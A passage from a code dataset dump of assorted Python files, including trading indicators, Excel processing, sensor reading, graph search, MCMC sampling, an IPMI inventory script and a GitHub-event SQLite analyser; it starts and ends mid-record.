prev_close).abs()\n tr = pd.DataFrame(data={'tr1': tr1, 'tr2': tr2, 'tr3': tr3}).max(axis=1)\n return tr\n\n\ndef dropna(df):\n \"\"\"Drop rows with \"Nans\" values\n \"\"\"\n df = df.copy()\n number_cols = df.select_dtypes('number').columns.to_list()\n df[number_cols] = df[number_cols][df[number_cols] < math.exp(709)] # big number\n df[number_cols] = df[number_cols][df[number_cols] != 0.0]\n df = df.dropna()\n return df\n\n\ndef sma(series, periods: int, fillna: bool = False):\n min_periods = 0 if fillna else periods\n return series.rolling(window=periods, min_periods=min_periods).mean()\n\n\ndef ema(series, periods, fillna=False):\n min_periods = 0 if fillna else periods\n return series.ewm(span=periods, min_periods=min_periods, adjust=False).mean()\n\n\ndef get_min_max(x1, x2, f='min'):\n \"\"\"Find min or max value between two lists for each index\n \"\"\"\n x1 = np.array(x1)\n x2 = np.array(x2)\n try:\n if f == 'min':\n return pd.Series(np.amin([x1, x2], axis=0))\n elif f == 'max':\n return pd.Series(np.amax([x1, x2], axis=0))\n else:\n raise ValueError('\"f\" variable value should be \"min\" or \"max\"')\n except Exception as e:\n return e\n\n\ndef pulse_conversion(x1: pd.Series, x2: pd.Series):\n \"\"\"\n returns 1 on the first occurrence of \"true\" signal in Array1\n then returns 0 until Array2 is true even if there are \"true\" signals in Array1\n\n :param x1: Series 1\n :param x2: Series 2\n :return: Pulse array as pd.Series\n \"\"\"\n x1 = np.array(x1)\n x2 = np.array(x2)\n result = np.full_like(x1, 0)\n\n last = False\n counter = 0\n for i, j in np.c_[x1, x2]:\n if i and not last:\n result[counter] = True\n last = True\n elif j and last:\n result[counter] = True\n last = False\n else:\n result[counter] = False\n counter = counter + 1\n\n return pd.Series(result)\n\n\n# def linear_regression(y: pd.Series, x: pd.Series = None, window: int = 13, has_const: bool = False,\n# use_const: bool = True, offset: bool = False):\n# \"\"\"\n# Smooths out a data series using the least squares method\n#\n# :param y : Y Series\n# :param x : X Series\n# :param window : int\n# Length of each rolling window\n# :param has_const : bool, default False\n# Specifies whether `x` includes a user-supplied constant (a column\n# vector). If False, it is added at instantiation\n# :param use_const : bool, default True\n# Whether to include an intercept term in the model output. Note the\n# difference between has_const and use_const. The former specifies\n# whether a column vector of 1s is included in the input; the latter\n# specifies whether the model itself should include a constant\n# (intercept) term. Exogenous data that is ~N(0,1) would have a\n# constant equal to zero; specify use_const=False in this situation\n# :param offset: Determines whether to add NaN values during the initial window of calculations\n# :return: Predicted Y values as pd.Series\n# \"\"\"\n# rolling_full = PandasRollingOLS(y=y, x=x, window=window, has_const=has_const, use_const=use_const)\n# rolling = pd.DataFrame(rolling_full.predicted)\n# rolling = rolling.iloc[window::window, :].values\n# rolling = pd.Series(np.concatenate(rolling).ravel(), name='predicted')\n#\n# pad = []\n# if offset:\n# for i in range(window - 1):\n# pad.append(np.nan)\n#\n# pad = pd.DataFrame(pd.Series(pad, name=\"predicted\"))\n# rolling = pd.concat([pad, rolling]).reset_index(drop=True)\n#\n# return rolling_full.predicted\n\n\n","sub_path":"ta/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442019604","text":"import xlrd\nimport os\nimport logging\nfrom xlutils.copy import copy\n\n\nclass AutoOffice:\n def __init__(self):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s', )\n logging.info(\"Now initializing..\")\n self.target_excel_files = []\n self.failed_excel_files = []\n self.target_cols = None\n logging.info(\"Reading serial key words..\")\n with open(\"../csv_autor/serial_key.txt\", \"r\") as fp:\n ret = fp.read()\n\n self.serial_key_list = ret.split(\",\")\n logging.info(\"Reading excel files..\")\n for file in os.listdir(\"../excelFiles\"):\n if file.endswith(\".xls\") or file.endswith(\"xlsx\"):\n self.target_excel_files.append(file)\n logging.info(\"Initialization succeed!\")\n\n def excel_process(self, file) -> bool:\n try:\n data = xlrd.open_workbook(\"./excelFiles/\" + file, formatting_info=True)\n sheet = data.sheets()[0]\n table_rows_nums = sheet.nrows\n table_cols_nums = sheet.ncols\n new_excel = copy(data)\n sheet_writer = new_excel.get_sheet(0)\n sheet_writer.write(0, table_cols_nums + 1, \"产品系列\")\n for col in range(table_cols_nums):\n if sheet.cell(0, col).value == \"宝贝标题\":\n self.target_cols = col\n if self.target_cols is None:\n return False\n for row in range(table_rows_nums):\n for key in self.serial_key_list:\n if key in str(sheet.cell(row, self.target_cols).value):\n sheet_writer.write(row, table_cols_nums + 1, key)\n try:\n new_excel.save(\"./results/{}\".format(file))\n except Exception as e:\n print(e)\n return True\n except Exception as e:\n self.failed_excel_files.append(file)\n logging.info(\"{}'s process failed, the error is: {}\".format(file, e))\n return False\n\n def start(self):\n logging.info(\"Begin to process excel files..\")\n for excel in self.target_excel_files:\n logging.info(\"Now processing {}\".format(excel))\n if self.excel_process(excel):\n logging.info(\"{}'s process succeed!\".format(excel))\n logging.info(\"Process finished\")\n if self.failed_excel_files:\n logging.info(\"Failed files are: {}\".format(self.failed_excel_files))\n\n\nif __name__ == '__main__':\n ao = AutoOffice()\n ao.start()\n","sub_path":"autoOffice/excel/mai_xlsx.py","file_name":"mai_xlsx.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478149898","text":"\ndef wyswietl(table):\n \"\"\" wyświetla cyfry w układzie 3xN \"\"\"\n n = 0\n for x in table:\n assert int(x), \"W tablicy znajdują się elementy nie będące cyframi\"\n if n > 0 and n % 3 == 0:\n print()\n print(f'{x} ', end='')\n n += 1\n print()","sub_path":"pp1/04-Subroutines/zad 1-10/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446898873","text":"import time,sys\nimport Adafruit_BBIO.GPIO as GPIO\n\nusleep = lambda x: time.sleep(x / 1000000.0)\n\n_TIMEOUT1 = 1000\n_TIMEOUT2 = 10000\n\nclass GroveUltrasonicRanger():\n def __init__(self, pin):\n self.__pin = pin\n\n def _get_distance(self):\n GPIO.cleanup()\n GPIO.setup(self.__pin, GPIO.OUT)\n GPIO.output(self.__pin,GPIO.LOW)\n usleep(2)\n GPIO.output(self.__pin,GPIO.HIGH)\n usleep(5)\n # time.sleep(20 / 1000000.0)\n # GPIO.output(self.__pin,GPIO.LOW)\n # print(\"configured succse!!!\")\n GPIO.setup(self.__pin, GPIO.IN)\n t0 = time.time()\n count = 0\n while count < _TIMEOUT1:\n if GPIO.input(self.__pin):\n # print(\"when breaked the count is\")\n # print(count)\n break\n count += 1\n else : \n print(\"time out\")\n return None\n t1 = time.time()\n count = 0\n while count < _TIMEOUT2:\n if not GPIO.input(self.__pin):\n break\n count += 1\n if count >= _TIMEOUT2:\n return None\n\n t2 = time.time()\n\n dt = int((t1 - t0) * 1000000)\n if dt > 530:\n return None\n\n distance = ((t2 - t1) * 1000000 / 29 / 2) # cm\n\n return distance\n\n def get_distance(self):\n while True:\n dist = self._get_distance()\n if dist:\n return dist\n\n\nGrove = GroveUltrasonicRanger\n\n\ndef main():\n if len(sys.argv) < 2:\n print('Usage:please input A0 A2 or PWM')\n sys.exit(1)\n if sys.argv[1] == 'A2':\n sonar = GroveUltrasonicRanger(\"P2_24\")\n if sys.argv[1] == 'A0':\n sonar = GroveUltrasonicRanger(\"P1_31\")\n if sys.argv[1] == 'PWM':\n sonar = GroveUltrasonicRanger(\"P2_1\")\n print('Detecting distance...')\n while True:\n print('{} cm'.format(sonar.get_distance()))\n time.sleep(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"grove_ultrasonic_ranger.py","file_name":"grove_ultrasonic_ranger.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488028724","text":"# from queue import PriorityQueue\n#\n#\n# class Graph:\n# def __init__(self):\n# self.edges = {}\n# self.weights = {}\n# self.visited = []\n# self.end_search = False\n#\n# def neighbors(self, node):\n# return self.edges[node]\n#\n# def get_cost(self, from_node, to_node):\n# return self.weights[(from_node + to_node)]\n#\n# def ucs(self, graph, start, goal):\n#\n# self.visited = set()\n# queue = PriorityQueue()\n# queue.put((0, start))\n#\n# while queue and not self.end_search:\n# cost, node = queue.get()\n# print(\"Drive to\", node, end=\"\\n\")\n#\n# if node not in self.visited:\n# print(\"Is this goal node \", goal, \"? Current Node \", node)\n# self.visited.add(node)\n#\n# if node == goal:\n# self.end_search = True\n# print(self.end_search)\n# self.visited.append(node)\n# break\n# for i in graph.neighbors(node):\n# if i not in self.visited:\n# total_cost = cost + graph.get_cost(node, i)\n# queue.put((total_cost, i))\nimport heapq\n\n\nclass Node:\n WEIGHT = 0\n NAME = 1\n\n\nclass UCS:\n\n def __init__(self):\n self.visited = []\n self.end_reached = False\n self.paths = []\n\n def ucs(self, graph, start_node, end_node):\n node = (0, start_node)\n frontier = [node] # Nodes to explore\n explored = set() # Set of explored nodes\n\n paths = [(0, [start_node])]\n\n while True:\n if not frontier:\n return 'Not found' # Work on this\n\n node = frontier.pop(0)\n current_path = paths.pop(0)\n explored.add(node[Node.NAME])\n # print('We drive to:', node[Node.NAME], ' frontier', frontier, ' paths', paths)\n # print('\\nWe drive to:', node[Node.NAME], ' paths', paths)\n print('\\nWe drive to:', node[Node.NAME], ' Path:', current_path)\n\n if node[Node.NAME] == end_node:\n self.visited = explored\n print('Path:', current_path[1])\n return 'Complete.' # Work on this\n\n for child in graph[node[Node.NAME]].items():\n child_weight = float(child[1]['weight']) + node[Node.WEIGHT]\n child_in_frontier = self.isValuePresentInTupleList(frontier, Node.NAME, child[0])\n if child[0] not in explored and child_in_frontier == -1:\n print('\\tWe peer at child node:', child[0], ' Weight:', child_weight)\n heapq.heappush(frontier, (child_weight, child[0]))\n heapq.heappush(paths, (child_weight, current_path[1] + [child[0]]))\n elif child_in_frontier != -1 and frontier[child_in_frontier][Node.WEIGHT] > child_weight:\n # print('Child in frontier', child[0], frontier[child_in_frontier][Node.WEIGHT], child_weight)\n frontier[child_in_frontier] = (child_weight, frontier[child_in_frontier][Node.NAME])\n self.changePathByLastNode(paths, child[0], (child_weight, current_path[1] + [child[0]]))\n\n print('\\n\\tFrontier paths:\\n\\t', paths, '\\n\\t', frontier)\n\n @staticmethod\n def isValuePresentInTupleList(tuple_list, tuple_index, value):\n for i, val in enumerate(tuple_list):\n if val[tuple_index] == value:\n return i\n\n return -1\n\n @staticmethod\n def changePathByLastNode(paths, node_name, new_path):\n for index, path in enumerate(paths):\n if path[1][-1] == node_name:\n paths[index] = new_path\n\n\na_list_of_tuples = [(1, 'a'), (2, 'b'), (3, 'c')]\nb = UCS.isValuePresentInTupleList(a_list_of_tuples, 1, 'd')\nprint(b)\nif b == -1:\n print('Condition is true')\nelse:\n print('Condition is false')\n\npaths = [(10, ['a', 'b']), (11, ['a', 'c']), (12, ['a', 'd'])]\n# UCS.removePathByLastNode(paths, 'c')\nprint(paths)\n","sub_path":"NairobiRoadNetwork/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355425185","text":"import numpy as np\r\n\r\ndef mcmc_sample(x, nparams=2, nwalkers=100, nRval=100, modelpdf = None, \r\n ipar_active = None, params=[], nsteps=1000000000, Rlim = 1.001):\r\n \"\"\"\r\n MCMC sampler implementing the Goodman & Weare (2010) affine-invariant algorithm\r\n inner loop is vectorized\r\n \r\n run for nsteps or until R_GR=Rlim is reached, whichever comes first\r\n \r\n \"\"\"\r\n \r\n try:\r\n import acor\r\n except:\r\n raise Exception(\"acor package is not installed! do: pip install acor\")\r\n \r\n # parameters used to draw random number with the GW10 proposal distribution\r\n ap = 2.0; api = 1.0/ap; asqri=1.0/np.sqrt(ap); afact=(ap-1.0)\r\n\r\n # calculate effective number of parameters if some are specified to be fixed\r\n ia = (ipar_active==1)\r\n npareff = np.size(ipar_active[ia])\r\n print((\"starting sampling with %d active parameters of the total %d parameters\"%(npareff, nparams)))\r\n \r\n # initialize some auxiliary arrays and variables \r\n chain = []; Rval = []; \r\n\r\n naccept = 0; ntry = 0; nchain = 0\r\n mw = np.zeros((nwalkers,npareff)); sw = np.zeros((nwalkers,npareff))\r\n m = np.zeros(npareff); Wgr = np.zeros(npareff); Bgr = np.zeros(npareff); Rgr = np.zeros(npareff)\r\n \r\n mutx = []; taux = []\r\n for i in range(npareff): \r\n mutx.append([]); taux.append([])\r\n Rval.append([])\r\n\r\n gxo = np.zeros((2,nwalkers/2))\r\n gxo[0,:] = modelpdf(x[0,:,:], params); gxo[1,:] = modelpdf(x[1,:,:], params)\r\n converged = False;\r\n while not converged:\r\n # for parallelization (not implemented here but the MPI version is available)\r\n # the walkers are split into two complementary sub-groups (see GW10)\r\n for kd in range(2):\r\n k = abs(kd-1)\r\n # vectorized inner loop of walkers stretch move in the Goodman & Weare sampling algorithm\r\n xchunk = x[k,:,:]\r\n jcompl = np.random.randint(0,nwalkers/2,nwalkers/2)\r\n xcompl = x[kd,jcompl,:]\r\n gxold = gxo[k,:]\r\n zf= np.random.rand(nwalkers/2) # the next few steps implement Goodman & Weare sampling algorithm\r\n zf = zf * afact; zr = (1.0+zf)*(1.0+zf)*api\r\n zrtile = np.transpose(np.tile(zr,(nparams,1))) # duplicate zr for nparams\r\n xtry = xcompl + zrtile*(xchunk-xcompl)\r\n gxtry = modelpdf(xtry, params); gx = gxold \r\n gr = gxtry - gx\r\n iacc = np.where(gr>0.)\r\n xchunk[iacc] = xtry[iacc]\r\n gxold[iacc] = gxtry[iacc]\r\n aprob = (npareff-1)*np.log(zr) + (gxtry - gx)\r\n u = np.random.uniform(0.0,1.0,np.shape(xchunk)[0]) \r\n iprob = np.where(aprob>np.log(u))\r\n xchunk[iprob] = xtry[iprob]\r\n gxold[iprob] = gxtry[iprob]\r\n naccept += len(iprob[0])\r\n\r\n x[k,:,ia] = np.transpose(xchunk[:,ia])\r\n gxo[k,:] = gxold \r\n xdum = x[:,:,ia]\r\n\r\n for i in range(nwalkers/2):\r\n chain.append(np.array(xdum[k,i,:]))\r\n\r\n for i in range(nwalkers/2):\r\n mw[k*nwalkers/2+i,:] += xdum[k,i,:]\r\n sw[k*nwalkers/2+i,:] += xdum[k,i,:]**2\r\n ntry += 1\r\n\r\n nchain += 1\r\n \r\n # compute means for the auto-correlation time estimate\r\n for i in range(npareff):\r\n mutx[i].append(np.sum(xdum[:,:,i])/(nwalkers))\r\n\r\n # compute Gelman-Rubin indicator for all parameters\r\n if ( nchain%nRval == 0):\r\n # calculate Gelman & Rubin convergence indicator\r\n mwc = mw/(nchain-1.0)\r\n swc = sw/(nchain-1.0)-np.power(mwc,2)\r\n\r\n for i in range(npareff):\r\n # within chain variance\r\n Wgr[i] = np.sum(swc[:,i])/nwalkers\r\n # mean of the means over Nwalkers\r\n m[i] = np.sum(mwc[:,i])/nwalkers\r\n # between chain variance\r\n Bgr[i] = nchain*np.sum(np.power(mwc[:,i]-m[i],2))/(nwalkers-1.0)\r\n # Gelman-Rubin R factor\r\n Rgr[i] = (1.0 - 1.0/nchain + Bgr[i]/Wgr[i]/nchain)*(nwalkers+1.0)/nwalkers - (nchain-1.0)/(nchain*nwalkers)\r\n tacorx = acor.acor(np.abs(mutx[i]))[0]; taux[i].append(np.max(tacorx))\r\n Rval[i].append(Rgr[i]-1.0)\r\n\r\n print((\"nchain = %d; tcorr = %.2e\"%(nchain, np.max(tacorx))))\r\n print((\"R_GR = \", Rgr))\r\n if (np.max(np.abs(Rgr-1.0)) < np.abs(Rlim-1.0)) or (nchain >= nsteps): converged = True\r\n \r\n print((\"MCMC sampler generated %d samples using %d walkers\"%(ntry, nwalkers)))\r\n print((\"with step acceptance ratio of %.3f\"%(1.0*naccept/ntry)))\r\n \r\n # record integer auto-correlation time at the final iteration\r\n nthin = int(tacorx)\r\n return chain, Rval, nthin\r\n\r\ndef mcmc_sample_init(nparams=2, nwalkers=100, x0=None, step=None, ipar_active=None):\r\n \"\"\"\r\n distribute initial positions of walkers in an isotropic Gaussian around the initial point\r\n \"\"\"\r\n np.random.seed()\r\n \r\n # in this implementation the walkers are split into 2 subgroups and thus nwalkers must be divisible by 2\r\n if nwalkers%2:\r\n raise ValueError(\"MCMCsample_init: nwalkers must be divisible by 2!\")\r\n \r\n x = np.zeros([2,nwalkers/2,nparams])\r\n\r\n for i in range(nparams):\r\n x[:,:,i] = np.reshape(np.random.normal(x0[i],step[i],nwalkers),(2,nwalkers/2))\r\n ina = (ipar_active==0)\r\n if np.size(ina) > 0:\r\n x[:,:,ina] = x0[ina]\r\n return x\r\n","sub_path":"omega500analysistools/example_notebooks/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":5557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507111772","text":"import json\nimport os\nimport time\nimport argparse\nimport sqlite3\n\nclass Data:\n def __init__(self, dict_address: int = None, reload: int = 0):\n if reload == 1:\n self.__init(dict_address)\n\n \n def __init(self, dict_address: str):\n #建立一个数据库并建立一个名为HOMEWOEK的表\n connector = sqlite3.connect('Information.db')\n connector.execute('''CREATE TABLE IF NOT EXISTS HOMEWORK (\n actor_login TEXT NOT NULL,\n event TEXT NOT NULL,\n user_repo TEXT NOT NULL);''') \n connector.commit()\n for f in os.listdir(dict_address):\n if f[-5:] == '.json':\n with open(dict_address + '\\\\' + f, 'r', encoding = 'utf-8') as f:\n for _x in f:\n #将键keys转为字符串类型\n records = json.loads(_x)\n data = (records['actor']['login'], records['type'], records['repo']['name'])\n #往表中添加信息\n connector.execute('INSERT INTO HOMEWORK(actor_login, event, user_repo) VALUES(?,?,?)',data)\n connector.commit()\n connector.close()\n print(0)\n\nclass Run:\n def __init__(self):\n self.parser = argparse.ArgumentParser()\n self.argInit()\n self.data = None\n self.operation()\n\n def argInit(self):\n self.parser.add_argument('-i', '--init')\n self.parser.add_argument('-u', '--user')\n self.parser.add_argument('-r', '--repo')\n self.parser.add_argument('-e', '--event')\n\n def operation(self):\n if self.parser.parse_args().init:\n self.data = Data(self.parser.parse_args().init, 1)\n return 0\n else:\n if self.data is None:\n self.data = Data()\n if self.parser.parse_args().event:\n if self.parser.parse_args().user:\n if self.parser.parse_args().repo:\n output(type=2, user=self.parser.parse_args().user, event=self.parser.parse_args().event,repo=self.parser.parse_args().repo)\n else:\n output(type=0,user=self.parser.parse_args().user,event=self.parser.parse_args().event)\n elif self.parser.parse_args().repo:\n output(type=1,repo=self.parser.parse_args().repo,event=self.parser.parse_args().event)\n else:\n raise RuntimeError('Error: Argument -l or -c is required.')\n else:\n raise RuntimeError('Error: Argument -e is required.')\n\ndef output(type, user=\"\", event=\"\", repo=\"\"):\n connector = sqlite3.connect('Information.db')\n if type == 0:\n cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? AND actor_login=?',(event,user))\n elif type == 1:\n cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? AND user_repo=?',(event,repo)) \n else:\n cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? AND user_repo=? AND actor_login=?', (event, repo, user)) \n print(len(list(cursor))) \n connector.close()\n\nif __name__ == '__main__':\n a = Run()\n ","sub_path":"GHAnalysis_3.0.py","file_name":"GHAnalysis_3.0.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494085494","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 14:52:21 2019\n\n@author: yaqianzhang\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlegends=['-o','.-','-*','-<','-^','-v','-.*','-o','.-','*-','<-','-o','.-']\ndef plot_cost(logger_list,names,mode=None):\n# params = {'legend.fontsize': 20,\n# 'axes.titlesize': 24,\n# 'axes.labelsize': 20,\n# 'lines.linewidth' : 3,\n# 'lines.markersize' : 10,\n# 'xtick.labelsize': 16,\n# 'ytick.labelsize': 16}\n# plt.rcParams.update(params)\n if(mode ==\"Strong\"):\n title_str = \"Strong Students\"\n elif(mode == \"Weak\"):\n title_str = \"Weak Students\"\n elif(mode==\"Gaussian\"):\n title_str=\"Data with Gaussian Distribution\"\n else:\n title_str=\"Data with Uniform Distribution\"\n\n \n algo_num = len(logger_list)\n legend_name = names\n \n #legends2=['-.o','.-.','-.*','-<','-^','-v','-.*','-o','.-','*-','<-','-o','.-']\n \n \n\n plt.figure(figsize=(5,4))#figsize=(8,6)\n ax = plt.subplot(111)\n for i in range(algo_num):\n #rewards = pfmc_to_reward(logger_list[i].arr_pfmc,threshold,pfmc_max)\n rewards = logger_list[i].arr_rwd\n time_reward = np.mean(rewards,axis=0)\n plt.plot(time_reward,legends[i])\n\n \n\n \n ax.legend(legend_name[:algo_num],loc='center right', bbox_to_anchor=(1, 0.55),\n ncol=2, fancybox=True, shadow=True)\n #plt.legend(legend_name[:num])\n plt.xlabel(\"Time step\")\n plt.ylabel(\"Cost\")\n #plt.yticks(np.arange(3), ('10^1', '10^0', '10^-1'))\n plt.title(title_str)\n #plt.ylim(0,1)\n \n fig = plt.gcf()\n #fig.set_size_inches(18.5, 10.5)\n fig.savefig('pic/'+title_str+'.png', dpi=600)\n plt.show()\n\n# \n ##################### action quality\n\n \ndef plot_arr_pfmc(logger_list,legend_name,mode=None):\n if(mode ==\"Strong\"):\n title_str = \"Strong Students\"\n \n elif(mode == \"Weak\"):\n title_str = \"Weak Students\"\n else:\n title_str=\"\"\n \n algo_num = len(logger_list)\n\n# \n plt.figure(figsize=(5,4))\n ax=plt.subplot(111)\n \n for i in range(algo_num):\n sr = logger_list[i].arr_pfmc\n time_match = np.mean(sr,axis = 0)\n plt.plot(time_match,legends[i])\n #temp_name.append(names[i]+' For WS')\n if(mode == \"Weak\"):\n plt.legend(legend_name[:algo_num],loc='lower right', bbox_to_anchor=(1, 0.7),\n ncol=2, fancybox=True, shadow=True)\n else:\n plt.legend(legend_name[:algo_num],loc='lower right', bbox_to_anchor=(1, 0),\n ncol=2, fancybox=True, shadow=True)\n #plt.ylabel(\"Percieved Difficulty\")\n plt.ylim(0,1)\n #plt.yticks([0, 0.5,1.0], [\"\",'',''])#\n plt.yticks([0, 0.5,1.0],[\"Hard\", \"Suitable\",\"Easy\"])\n plt.title(title_str)\n \n plt.xlabel(\"Time step\")\n fig = plt.gcf()\n #fig.set_size_inches(18.5, 10.5)\n fig.savefig('pic/'+title_str+'.png', dpi=600)\n \n \n\n \n","sub_path":"Difficulty_Adaptation/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129670993","text":"#!/usr/bin/env python\n\nfrom lib.cloudstack import CloudStackAPI\n\n__all__ = [\n 'SSHKeyPairCreate'\n]\n\n\nclass SSHKeyPairCreate(CloudStackAPI):\n def run(self, url, apikey, secretkey, name, project_id):\n cs = self.get_client(url, apikey, secretkey)\n\n return cs.createSSHKeyPair(name=name, projectid=project_id)\n","sub_path":"actions/sshkeypair_create.py","file_name":"sshkeypair_create.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135079353","text":"# Python module imports.\nimport os\n\n# relax module imports.\nfrom auto_analyses.dauvergne_protocol import dAuvergne_protocol\nfrom pipe_control import pipes\n\n# The results dir.\nvar = 'result_10'\nresults_dir = os.getcwd() + os.sep + var\n\n# Load the state with setup.\nstate.load(state=var+'_ini.bz2', dir=results_dir, force=True)\n\n# Read the pipe info\npipe.display()\npipe_name = pipes.cdp_name()\npipe_bundle = pipes.get_bundle(pipe_name)\n\n# Analysis variables.\n#####################\n# The diffusion model. Standard is 'Fully automated', which means: DIFF_MODEL=['local_tm', 'sphere', 'prolate', 'oblate', 'ellipsoid', 'final']\n# 'local_tm', 'sphere', ''prolate', 'oblate', 'ellipsoid', or 'final'\n#DIFF_MODEL = ['local_tm', 'sphere', 'prolate', 'oblate', 'ellipsoid', 'final']\nDIFF_MODEL = ['oblate']\n\n# The grid search size (the number of increments per dimension).\nGRID_INC = 11\n\n# The number of Monte Carlo simulations to be used for error analysis at the end of the analysis.\n# This has no influence in Model 1-5\nMC_NUM = 0\n\n# The maximum number of iterations for the global iteration. \n# Set to None, then the algorithm iterates until convergence.\nMAX_ITER = 20\n\n# Run protocol\ndAuvergne_protocol(pipe_name=pipe_name, pipe_bundle=pipe_bundle, \n results_dir=results_dir,\n write_results_dir=results_dir,\n diff_model=DIFF_MODEL,\n grid_inc=GRID_INC,\n mc_sim_num=MC_NUM,\n max_iter=MAX_ITER)\n","sub_path":"13_Model_4_IV_oblate.py","file_name":"13_Model_4_IV_oblate.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328637610","text":"class Settings():\r\n\t#class for saving new settings of our game \r\n\t\r\n\tdef __init__(self):\r\n\t\t#initializing settings \r\n\t\t#screen parametrs\r\n\t\tself.screen_width = 1200\r\n\t\tself.screen_height = 600\r\n\t\tself.bg_color = (105,105,105)\r\n\t\t\r\n","sub_path":"Alien_Invasion/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242648400","text":"#!/usr/bin/env python3\n\nimport sys\nfrom operator import itemgetter\nfrom collections import defaultdict\nimport ast\n\nfinal_data = []\n\nfor line in sys.stdin:\n\tif line:\n\t\tfinal_data.append(ast.literal_eval(line))\n\nsorted_fd_list = sorted(final_data,key=itemgetter(1), reverse=True)\n\nd = defaultdict(float)\n\nfor x, y in sorted_fd_list:\n d[x] += float(y)\n\nfinal_list = [(x, round(y, 2)) for x, y in d.items()]\n\nsorted_final_list = sorted(final_list,key=itemgetter(1), reverse=True)\n\nfor k,v in sorted_final_list[0:10]:\n\tprint(k)\n\t\n","sub_path":"Hadoop/trigram_reducer_2.py","file_name":"trigram_reducer_2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"200218252","text":"#!/usr/bin/env python\n# Copyright 2016 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import nested_scopes, generators, division, absolute_import, \\\n with_statement, print_function, unicode_literals\nimport sys\nimport os.path\nfrom orderedattrdict import AttrDict\n\nfrom lib.inventory import Inventory\nfrom lib.logger import Logger\nfrom get_mgmt_switch_config import GetMgmtSwitchConfig\nfrom get_dhcp_lease_info import GetDhcpLeases\nfrom lib.logger import Logger\n\n\nclass InventoryAddIpmi(object):\n def __init__(self, dhcp_leases_file, log_level, inv_file, cfg_file):\n log = Logger(__file__)\n if log_level is not None:\n log.set_level(log_level)\n\n dhcp_leases = GetDhcpLeases(dhcp_leases_file, log_level)\n dhcp_mac_ip = dhcp_leases.get_mac_ip()\n\n inv = Inventory(log_level, inv_file, cfg_file)\n mgmt_switch_config = GetMgmtSwitchConfig(log_level)\n mgmt_sw_cfg = AttrDict()\n for rack, ipv4 in inv.yield_mgmt_rack_ipv4():\n mgmt_sw_cfg[rack] = mgmt_switch_config.get_port_mac(rack, ipv4)\n\n inv.create_nodes(dhcp_mac_ip, mgmt_sw_cfg)\n\n for rack, mac, ip in inv.yield_node_ipmi():\n log.info(\n 'IPMI node detected - Rack: %s - MAC: %s - IP: %s' %\n (rack, mac, ip))\n\nif __name__ == '__main__':\n \"\"\"\n Arg1: config file\n Arg2: inventory file\n Arg3: DHCP leases file\n Arg4: log level\n \"\"\"\n log = Logger(__file__)\n\n ARGV_MAX = 5\n argv_count = len(sys.argv)\n if argv_count > ARGV_MAX:\n try:\n raise Exception()\n except:\n log.error('Invalid argument count')\n exit(1)\n\n cfg_file = sys.argv[1]\n inv_file = sys.argv[2]\n dhcp_leases_file = sys.argv[3]\n if len(sys.argv) == ARGV_MAX:\n log_level = sys.argv[4]\n else:\n log_level = None\n\n ipmi_data = InventoryAddIpmi(\n dhcp_leases_file, log_level, inv_file, cfg_file)\n","sub_path":"scripts/python/inv_add_ipmi_ports.py","file_name":"inv_add_ipmi_ports.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516485050","text":"import datetime as dt\nimport copy\nfrom accounts.data.userlevel import UserLevel\nfrom accounts.data.userlevel import AdminLevelType\nfrom accounts.data.userlevel import AdminLevelStatusType\nfrom accounts.databases.database import Database\nfrom accounts.repositories.repository import Repository\nfrom accounts.databases.sqlresult import SQLResult\n\n\nclass AdministratorLevelRepository(Repository):\n def __init__(self, **kwargs):\n kwargs[\"name\"] = 'tbl_administration_level'\n super().__init__(**kwargs)\n if self.Database is not None:\n self.Database.Execute(\n \"CREATE TABLE IF NOT EXISTS {0} (user_uuid text primary key, admin_level text, status int, expired_date text,\"\n \" date_assigned text, date_created 